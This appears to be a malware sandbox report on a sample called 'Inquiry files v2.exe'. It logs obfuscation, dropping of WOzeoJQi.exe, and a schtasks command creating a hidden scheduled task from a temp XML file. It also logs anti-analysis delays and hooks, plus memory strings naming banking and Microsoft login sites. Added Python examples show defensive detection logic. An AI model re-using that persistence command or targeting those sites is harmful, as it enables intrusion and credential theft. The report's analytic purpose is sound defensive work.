                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, Iaw16YkCGRrhvwssRD.cs  High entropy of concatenated method names: 'WXtv7llwi3XHbs1g6j4', 'G1As3Ul3OS8yXTy3Lox', 'CGJMRTAyYq', 'fjcMnZB5eE', 'KZyMFYkGNl', 'zXkVdvlDJbK7tIv6sUQ', 'X23HXklJrOZA005LXjt'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, sQrBoGHOW8sZ4NdJCW6.cs  High entropy of concatenated method names: 'GlxnjyfOf8', 'e1FnN9E9EH', 'gKGnLluL9K', 'AKDnEgKNcS', 'RSyn5FJsdQ', 'pAbnCuhsYJ', 'enUnArXsUJ', 'Wvbnq4c6Kt', 'wVTn8TLJpF', 'g7UnUYSYmU'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, zXWN9WzH8pby7yOLqB.cs  High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wnpnyttvw9', 'gWynVRlGw1', 'wF7nsjv5YR', 'xYenW5KQsZ', 'aIQnR5NHpW', 'PlCnnj7SMU', 'uv6nFGttZ0'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, dXvfmhcjUU1IvInRn0.cs  High entropy of concatenated method names: 'hdQxbsFLwr', 'No9xJy2nbG', 'nmAxPNeC0e', 'cRpxi6Vco7', 'TMkx1TwcDL', 'YYuxMievUe', 'bAMxmDrn9W', 'ltnxc7QaaI', 'WTKx7quNxb', 'eLNx4oT9ih'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, z9xxqSQCcDIiA5no9d.cs  High entropy of concatenated method names: 'TqkRJWeB00', 'mDLRPiSXOi', 'ndpRip5cOb', 'PD8R11WSa5', 'Q0lRMyhNTF', 'd6VRmCOXXt', 'OOGRcOVypU', 'LT8R71UdwW', 'IM3R4q2iDn', 'w1mRdHLXuZ'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, ONUvsHu6o3qpAtjg92.cs  High entropy of concatenated method names: 'PGVRlBGM1r', 'YwWRkaqOgG', 'B5bRfMCTjC', 'ef8R6dArhr', 'pnDR3Xc3TH', 'MwWRDwUCmr', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, paThBMSOJ76UKWtP6l.cs  High entropy of concatenated method names: 'HFvyq7QLr7', 'gdZy8MX3aR', 'ktUylajRJD', 'igOyklRwLu', 'tKQy6M6PnI', 'DhgyDVs3ni', 'iNHyg0yOmD', 'm0ZyGBXbF9', 'fSLyYTNSCj', 'jIvyB6f4tt'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, em0U7JedTtUKjqHMVv.cs  High entropy of concatenated method names: 'RRBHm1URIr', 'OHRHc6xNO4', 'XadH4vRoD3', 'dE6HdYYphO', 'oNPHV0oyxp', 'wWfHs4hcHk', 'vnYH4kGDNmnclCFUoV', 'ofRUYIOhansnhYUH8Z', 'GG1HHc1b78', 'vKwHxvaiY7'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, DjpZQ1gsO0XPxZHgSH.cs  High entropy of concatenated method names: 'vdZmJarCyj', 'NxamiC1DmC', 'saFmMSJkaC', 'CUtMICfIMZ', 'hqWMz6uwf1', 'aM5mO1mdUB', 'o5SmHTWpfh', 'WInm2HLNbR', 'HF4mxnp84d', 'BC0me0AnAd'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, yQuZju8advRoD3eE6Y.csHigh entropy of concatenated method names: 'pvBiE8IqZH', 'nBriCdWbmK', 'GjbiqQCp4q', 'fpmi8k8Mlv', 'SGRiVb7Ndq', 'jZLis4I90k', 'vUXiWXbfXV', 'V2XiR3nkvL', 'hSWin5l3qq', 'kUSiF2WvUV'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, Oljwv0IDGOkciAFk1i.csHigh entropy of concatenated method names: 'zadnHgxwta', 'Ag4nxHvKeD', 'tJWneyc2Jm', 'GaInJ7sOXI', 'oLWnPdABUF', 'Ynun1mAD0b', 'KqsnMSn8fT', 'XTDRvNs1dB', 'g1yRQQ5xAO', 'Wi8Ruiu2nM'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, nxp0Wfl4hcHkqoxfUr.csHigh entropy of concatenated method names: 'OMpMbV0vBB', 'GUmMPpXhe8', 'CPEM1UBFSy', 'VxMMmiC0W0', 'ODpMchfYno', 'KJY1tlJi1B', 'm301ZgXtbF', 'ISU1vNar6l', 'FAN1QkQbnu', 'Puo1uE1B04'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, KUXFLP2Tf6bu2LcpAl.csHigh entropy of concatenated method names: 'SCtLOVoPO', 'bORE42dN1', 'PvQCxpaup', 'S3rAnwEee', 'L168TstpF', 'ignUTnjcR', 'DAOlBLoLcyRVxtWy8J', 'BiFRYBAcrVdZK4etNy', 'FafREsJpw', 'lNCFOekeX'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, XIcXtJZs5E4qdHiFOc.csHigh entropy of concatenated method names: 'vFyWQgKM9G', 'h7uWIlsqX9', 'NtJRO8pvKn', 'JnJRHiR5cj', 'CO8WB5MOef', 'Up4WXmGAGZ', 'GsrWSKqNUd', 'YDwW3ygmRM', 'AURWr1umB9', 'zxkWpHp0NN'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, NphOiYUtNppdnVNP0o.csHigh entropy of concatenated method names: 'cjg15VRY1R', 'bwv1AkegrP', 'KHUifBW9rX', 'guUi6DIvY1', 'TCoiDbY8DB', 'GQ6iT3ElbF', 'JJwigEEkBY', 'OsqiGvjwyP', 'ukGiatkhTd', 'EmBiYlFFaw'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, yBDYpcHxNcyjRMMUrDE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Yy7F3oHeKY', 'A2tFrGpYbU', 'q8jFpWZ6WC', 'EFDFK6VEdD', 'QcSFtmcKa6', 'k97FZjsucy', 'kSuFvvtAUm'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, mwg71tKArOF0T47qXV.csHigh entropy of concatenated method names: 'UNMW4Qv3YA', 'D2GWdfCARu', 'ToString', 'UKNWJDNAAB', 'bmNWPG5dtp', 'j5LWiDk5t5', 'fuyW107wyo', 'T5FWMImNP6', 'UV6Wm6VraW', 'Ho7WcxMdEF'
                Source: 9.2.WOzeoJQi.exe.27bdc94.0.raw.unpack, VU5FiiciHrPuThVwBQ.csHigh entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
                Source: 9.2.WOzeoJQi.exe.27bdc94.0.raw.unpack, cw37txoRO4X56hm21l.csHigh entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
                Source: C:\Users\user\Desktop\Inquiry files v2.exeFile created: C:\Users\user\AppData\Roaming\WOzeoJQi.exeJump to dropped file
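Added example, not part of the Joe Sandbox report or its signature engine: how the "High entropy of concatenated method names" heuristic listed above can be reproduced. The method names are copied from two of the listed classes (cw37txoRO4X56hm21l.cs and zXWN9WzH8pby7yOLqB.cs); the benign class, the 5.0-bit entropy threshold and the digit-ratio check are assumptions for illustration.

```python
import math
from collections import Counter

# Method names copied from two signature lines above: the fully renamed class
# cw37txoRO4X56hm21l.cs, and zXWN9WzH8pby7yOLqB.cs whose first three names are
# TypeConverter overrides the obfuscator had to leave intact.
OBFUSCATED = ['X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o',
              'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj']
MIXED = ['CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wnpnyttvw9', 'gWynVRlGw1',
         'wF7nsjv5YR', 'xYenW5KQsZ', 'aIQnR5NHpW', 'PlCnnj7SMU', 'uv6nFGttZ0']
# Constructed benign class for comparison (not taken from the sample).
BENIGN = ['GetCustomer', 'SaveCustomer', 'DeleteCustomer', 'LoadSettings',
          'SaveSettings', 'OnButtonClick', 'InitializeComponent', 'Dispose',
          'ToString', 'Validate']

# Assumed thresholds: bits per character of the joined names, and the share of
# names that contain a digit (hand-written C# method names rarely do).
ENTROPY_THRESHOLD = 5.0
DIGIT_RATIO_THRESHOLD = 0.5


def shannon_entropy(text: str) -> float:
    """Bits per character of the string's symbol distribution."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def concatenated_entropy(names) -> float:
    """Entropy of all method names joined, which is what the signature measures."""
    return shannon_entropy(''.join(names))


def digit_ratio(names) -> float:
    """Fraction of method names that contain at least one digit."""
    return sum(any(ch.isdigit() for ch in name) for name in names) / len(names)


def classify(names):
    """Return (flagged, entropy, digit_ratio) for one class's method names."""
    h = concatenated_entropy(names)
    d = digit_ratio(names)
    return (h >= ENTROPY_THRESHOLD or d >= DIGIT_RATIO_THRESHOLD), h, d


if __name__ == '__main__':
    for label, names in (('obfuscated', OBFUSCATED), ('mixed', MIXED), ('benign', BENIGN)):
        flagged, h, d = classify(names)
        print(f'{label:10s} entropy={h:.2f} bits/char  digit_ratio={d:.1f}  flagged={flagged}')
```

Framework overrides such as ToString, Dispose, CanConvertFrom and Next survive renaming because the obfuscator must keep the signatures the runtime or base class calls by name. That is why the signature scores the concatenation of every name in the class rather than each name on its own, and why a second, cheaper signal like the digit ratio is worth keeping beside it for classes where the inherited names dilute the entropy.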

                Boot Survival

                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp"
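Added example, not from the report or from Joe Sandbox: process-creation detection logic for the schtasks command line recorded above. The events are constructed in Sysmon Event ID 1 field names; the first reproduces the recorded command line, while the temp-path list and the other two events are assumptions for illustration.

```python
import re
from typing import Optional

# Locations from which no installer should be feeding a task definition.
# The list is an assumption for this example; extend it for your estate.
TEMP_PATH_RE = re.compile(
    r'(\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|%TE?MP%)', re.IGNORECASE)

# Constructed process-creation events (Sysmon Event ID 1 field names). The
# first one reproduces the command line recorded in the report above.
EVENTS = [
    {'Image': r'C:\Windows\SysWOW64\schtasks.exe',
     'ParentImage': r'C:\Users\user\Desktop\Inquiry files v2.exe',
     'CommandLine': r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" '
                    r'/XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp"'},
    {'Image': r'C:\Windows\System32\schtasks.exe',
     'ParentImage': r'C:\Windows\System32\msiexec.exe',
     'CommandLine': r'schtasks.exe /Create /TN "Backup\Nightly" /XML "C:\ProgramData\Backup\nightly.xml"'},
    {'Image': r'C:\Windows\System32\schtasks.exe',
     'ParentImage': r'C:\Windows\System32\cmd.exe',
     'CommandLine': r'schtasks.exe /Query /TN "Updates\WOzeoJQi"'},
]


def tokenize(cmdline: str):
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_schtasks(cmdline: str) -> dict:
    """Map schtasks switches (lower-cased) to their value, or True for bare flags."""
    tokens = tokenize(cmdline)
    opts = {}
    i = 1  # tokens[0] is the program name
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith('/'):
            if i + 1 < len(tokens) and not tokens[i + 1].startswith('/'):
                opts[tok.lower()] = tokens[i + 1]
                i += 2
                continue
            opts[tok.lower()] = True
        i += 1
    return opts


def evaluate(event: dict) -> Optional[str]:
    """Finding text for schtasks /Create whose /XML lives in a temp path, else None."""
    # Match on the file name only: a 32-bit parent gets the SysWOW64 copy.
    if not event['Image'].lower().endswith('\\schtasks.exe'):
        return None
    opts = parse_schtasks(event['CommandLine'])
    if '/create' not in opts:
        return None
    xml = opts.get('/xml')
    if not isinstance(xml, str) or not TEMP_PATH_RE.search(xml):
        return None
    return (f"scheduled task {opts.get('/tn', '?')} created from temp XML {xml} "
            f"by {event['ParentImage']}")


def scan(events):
    """Run evaluate() over a batch of events and collect the findings."""
    return [finding for finding in (evaluate(e) for e in events) if finding]


if __name__ == '__main__':
    for finding in scan(EVENTS):
        print(finding)
```

The recorded image is C:\Windows\SysWOW64\schtasks.exe although the command line names System32: the 32-bit parent is subject to WOW64 file-system redirection, so a rule keyed on the full System32 path misses this case. On a host where the sample ran, the resulting definition can be dumped with schtasks /Query /TN "Updates\WOzeoJQi" /XML; the XML file in %TEMP% is typically deleted by the dropper once the task exists, so the task store is the more reliable artifact.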

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 occurrences)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 occurrences)
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Process information set: NOOPENFILEERRORBOX (52 occurrences)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (99 occurrences)
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Process information set: NOOPENFILEERRORBOX (54 occurrences)
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\runas.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: Inquiry files v2.exe PID: 7124, type: MEMORYSTR
Source: C:\Windows\SysWOW64\runas.exe | API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\runas.exe | API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\runas.exe | API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\runas.exe | API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\runas.exe | API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\runas.exe | API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\runas.exe | API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\runas.exe | API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Users\user\Desktop\Inquiry files v2.exe | Memory allocated: 13D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Inquiry files v2.exe | Memory allocated: 2F70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Inquiry files v2.exe | Memory allocated: 2E70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Inquiry files v2.exe | Memory allocated: 81B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Inquiry files v2.exe | Memory allocated: 91B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Inquiry files v2.exe | Memory allocated: 9370000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Inquiry files v2.exe | Memory allocated: A370000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Memory allocated: 880000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Memory allocated: 2790000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Memory allocated: B80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Memory allocated: 7380000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Memory allocated: 8380000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Memory allocated: 8520000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Memory allocated: 9520000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F096E rdtsc 7_2_012F096E
Source: C:\Users\user\Desktop\Inquiry files v2.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6412
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2058
Source: C:\Windows\SysWOW64\runas.exe | Window / User API: threadDelayed 9824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | API coverage: 0.7 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | API coverage: 0.2 %
Source: C:\Users\user\Desktop\Inquiry files v2.exe TID: 4416 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2196 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6748 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe TID: 2704 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe TID: 1416 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\runas.exe TID: 4852 | Thread sleep count: 147 > 30
Source: C:\Windows\SysWOW64\runas.exe TID: 4852 | Thread sleep time: -294000s >= -30000s
Source: C:\Windows\SysWOW64\runas.exe TID: 4852 | Thread sleep count: 9824 > 30
Source: C:\Windows\SysWOW64\runas.exe TID: 4852 | Thread sleep time: -19648000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\runas.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\Inquiry files v2.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Thread delayed: delay time: 922337203685477
Source: 023115.16.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 023115.16.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 023115.16.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 023115.16.dr | Binary or memory string: discord.comVMware20,11696487552f
Source: 023115.16.dr | Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: WOzeoJQi.exe, 00000009.00000002.2513134857.0000000006C19000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:W
Source: runas.exe, 00000010.00000002.3378201060.0000000008147000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s.office.comVMware20,116
Source: runas.exe, 00000010.00000002.3378201060.0000000008147000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: swordVMware20,11
Source: 023115.16.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: runas.exe, 00000010.00000002.3378201060.0000000008147000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: COM.HKVMware20,(|4
Source: 023115.16.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 023115.16.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 023115.16.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 023115.16.dr | Binary or memory string: global block list test formVMware20,11696487552
Source: 023115.16.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
Source: runas.exe, 00000010.00000002.3378201060.0000000008147000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .comVMware20,116
Source: 023115.16.dr | Binary or memory string: AMC password management pageVMware20,11696487552
Source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3374212695.000000000159E000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3372111139.0000000003078000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000013.00000002.3030632235.000001B8D2DAC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 023115.16.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 023115.16.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 023115.16.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 023115.16.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 023115.16.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: runas.exe, 00000010.00000002.3378201060.0000000008147000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rdVMware20,11696
Source: WOzeoJQi.exe, 00000009.00000002.2513062532.0000000006BF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 023115.16.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 023115.16.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 023115.16.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 023115.16.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 023115.16.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 023115.16.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: runas.exe, 00000010.00000002.3378201060.0000000008147000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .co.inVMware20,1
Source: 023115.16.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 023115.16.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 023115.16.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
Source: runas.exe, 00000010.00000002.3378201060.0000000008147000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: re.comVMware20,1
Source: 023115.16.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: runas.exe, 00000010.00000002.3378201060.0000000008147000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e365.comVMware20
Source: 023115.16.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 023115.16.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 023115.16.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 023115.16.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\Inquiry files v2.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\runas.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F096E rdtsc 7_2_012F096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00417953 LdrLoadDll, 7_2_00417953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012E0124 mov eax, dword ptr fs:[00000030h] 7_2_012E0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01370115 mov eax, dword ptr fs:[00000030h] 7_2_01370115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0135A118 mov ecx, dword ptr fs:[00000030h] 7_2_0135A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0135A118 mov eax, dword ptr fs:[00000030h] 7_2_0135A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0135E10E mov eax, dword ptr fs:[00000030h] 7_2_0135E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0135E10E mov ecx, dword ptr fs:[00000030h] 7_2_0135E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0135E10E mov eax, dword ptr fs:[00000030h] 7_2_0135E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0135E10E mov ecx, dword ptr fs:[00000030h] 7_2_0135E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0135E10E mov eax, dword ptr fs:[00000030h] 7_2_0135E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0135E10E mov ecx, dword ptr fs:[00000030h] 7_2_0135E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0135E10E mov eax, dword ptr fs:[00000030h] 7_2_0135E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0135E10E mov ecx, dword ptr fs:[00000030h] 7_2_0135E10E
